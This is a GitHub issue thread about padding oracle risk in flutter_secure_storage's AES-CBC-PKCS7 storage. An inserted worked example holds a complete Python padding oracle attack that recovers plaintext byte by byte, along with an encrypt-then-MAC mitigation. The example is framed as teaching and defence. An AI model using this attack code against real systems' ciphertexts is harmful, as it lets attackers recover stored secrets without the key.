
PKCS5 and PKCS7 are known to be vulnerable to padding oracle attacks

Open eikebartels opened this issue 2 years ago • 2 comments

This package seems to use AES-CBC-PKCS7 encryption for secure storage.

PKCS5 and PKCS7 are known to be vulnerable to padding oracle attacks in combination with CBC mode of operation. The issue occurs if an app reports failed encryption. By that, the plaintext can be restored piece by piece, as only byte-sized blocks are brute-forced.

Flutter seems to expose the EncryptedSharedPreferences of Android. They are the go-to solution. See https://pub.dev/packages/flutter_secure_storage and https://developer.android.com/reference/androidx/security/crypto/EncryptedSharedPreferences

eikebartels avatar Jul 14 '23 13:07 eikebartels
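Worked example added by the editor; this is not code from flutter_secure_storage or from this issue. It shows the attack the report describes: an app that lets an attacker observe whether decryption of CBC ciphertext failed on the PKCS#7 padding check becomes an oracle, and the attacker recovers the plaintext one byte per block position with at most 256 queries per byte, never touching the key. Assumptions: a small keyed Feistel permutation stands in for AES so the file runs on the Python standard library alone (the attack never looks inside the block cipher and runs unchanged against AES), the ciphertext is IV-prefixed, the function and key names are the editor's, and the sample plaintext is constructed. The encrypt-then-MAC functions at the end are the editor's illustration of the standard mitigation, not the fix referenced elsewhere in this thread.

```python
import hashlib
import hmac
import os

BLOCK = 16

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

# Stand-in block cipher (an assumption, not AES): a keyed 4-round Feistel
# permutation on 16-byte blocks. The attack never looks inside it.
def _f(key, half, rnd):
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]

def block_encrypt(key, block):
    l, r = block[:8], block[8:]
    for rnd in range(4):
        l, r = r, xor(l, _f(key, r, rnd))
    return l + r

def block_decrypt(key, block):
    l, r = block[:8], block[8:]
    for rnd in reversed(range(4)):
        l, r = xor(r, _f(key, l, rnd)), l
    return l + r

def pkcs7_unpad(data):
    n = data[-1] if data else 0
    if len(data) % BLOCK or not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")  # exposing this failure is the oracle
    return data[:-n]

def cbc_encrypt(key, plaintext, iv=None):
    n = BLOCK - len(plaintext) % BLOCK
    padded, prev = plaintext + bytes([n]) * n, iv or os.urandom(BLOCK)  # PKCS#7
    out = bytearray(prev)
    for i in range(0, len(padded), BLOCK):
        prev = block_encrypt(key, xor(padded[i:i + BLOCK], prev))
        out += prev
    return bytes(out)  # IV || C1 || C2 || ...

def cbc_decrypt(key, ct):
    prev, out = ct[:BLOCK], bytearray()
    for i in range(BLOCK, len(ct), BLOCK):
        out += xor(block_decrypt(key, ct[i:i + BLOCK]), prev)
        prev = ct[i:i + BLOCK]
    return pkcs7_unpad(bytes(out))

def make_oracle(decrypt):
    # Models an app that reports whether decryption failed (True = accepted).
    def oracle(ct):
        try:
            decrypt(ct)
            return True
        except ValueError:
            return False
    return oracle

def padding_oracle_attack(ct, oracle):
    blocks = [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    plain = bytearray()
    for prev, target in zip(blocks, blocks[1:]):
        inter = bytearray(BLOCK)  # D_k(target), learned one byte at a time
        for pos in range(BLOCK - 1, -1, -1):
            pad = BLOCK - pos
            forged = bytearray(BLOCK)  # crafted "previous block", fed as the IV
            for j in range(pos + 1, BLOCK):
                forged[j] = inter[j] ^ pad  # already-known bytes decrypt to `pad`
            for guess in range(256):
                forged[pos] = guess
                if not oracle(bytes(forged) + target):
                    continue
                if pos == BLOCK - 1:  # rule out an accidental \x02\x02 hit
                    check = forged[:pos - 1] + bytes([forged[pos - 1] ^ 0xFF]) + forged[pos:]
                    if not oracle(bytes(check) + target):
                        continue
                inter[pos] = guess ^ pad
                break
            else:
                raise RuntimeError("oracle never accepted a guess")
        plain += xor(bytes(inter), prev)
    return pkcs7_unpad(bytes(plain))

# Mitigation: encrypt-then-MAC, verifying the tag before any unpadding.
def etm_encrypt(enc_key, mac_key, plaintext, iv=None):
    ct = cbc_encrypt(enc_key, plaintext, iv)
    return ct + hmac.new(mac_key, ct, hashlib.sha256).digest()

def etm_decrypt(enc_key, mac_key, blob):
    ct, tag = blob[:-32], blob[-32:]
    if not hmac.compare_digest(hmac.new(mac_key, ct, hashlib.sha256).digest(), tag):
        raise ValueError("authentication failed")
    return cbc_decrypt(enc_key, ct)

def attack_is_blocked(enc_key, mac_key, blob):
    # Attacker can rewrite blocks but not forge tags: no guess is ever accepted.
    oracle = make_oracle(lambda ct: etm_decrypt(enc_key, mac_key, ct + blob[-32:]))
    try:
        padding_oracle_attack(blob[:-32], oracle)
        return False
    except RuntimeError:
        return True
```

The attacker only ever sends a crafted 16-byte "IV" followed by one real ciphertext block and watches the accept/reject bit; for the last byte of a block the extra query guards against a false positive where the forged block happens to decrypt to valid \x02\x02 (or longer) padding instead of \x01. With the tag checked first, every tampered query is rejected for the same reason regardless of its padding, so the attack has nothing to learn from; an AEAD mode such as AES-GCM gives the same property without a separate MAC.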

So this happens on Android as Android is using EncryptedSharedPreferences

mkhtradm01 avatar Jul 15 '23 04:07 mkhtradm01

Possible duplicate of #526?

ernestomar avatar Aug 15 '23 14:08 ernestomar

Please read #769 for an upcoming fix for this issue.

juliansteenbakker avatar Aug 13 '24 20:08 juliansteenbakker